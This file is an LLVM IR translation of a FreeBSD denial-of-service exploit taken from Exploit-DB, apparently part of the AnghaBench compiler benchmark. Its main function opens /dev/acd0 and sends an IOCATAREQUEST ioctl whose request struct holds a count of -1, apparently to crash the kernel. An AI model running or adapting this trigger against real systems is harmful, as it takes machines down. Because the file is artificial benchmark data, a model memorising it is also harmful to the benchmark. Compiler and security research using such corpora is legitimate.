; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/freebsd/dos/extr_9134.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/freebsd/dos/extr_9134.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.ata_ioc_requestz = type { i32 }

@.str = private unnamed_addr constant [10 x i8] c"/dev/acd0\00", align 1
@O_RDONLY = common dso_local global i32 0, align 4
@IOCATAREQUEST = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca %struct.ata_ioc_requestz, align 4
  %3 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %4 = getelementptr inbounds %struct.ata_ioc_requestz, %struct.ata_ioc_requestz* %2, i32 0, i32 0
  store i32 -1, i32* %4, align 4
  %5 = load i32, i32* @O_RDONLY, align 4
  %6 = call i32 @open(i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str, i64 0, i64 0), i32 %5)
  store i32 %6, i32* %3, align 4
  %7 = load i32, i32* %3, align 4
  %8 = load i32, i32* @IOCATAREQUEST, align 4
  %9 = call i32 @ioctl(i32 %7, i32 %8, %struct.ata_ioc_requestz* %2)
  ret i32 0
}

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @ioctl(i32, i32, %struct.ata_ioc_requestz*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
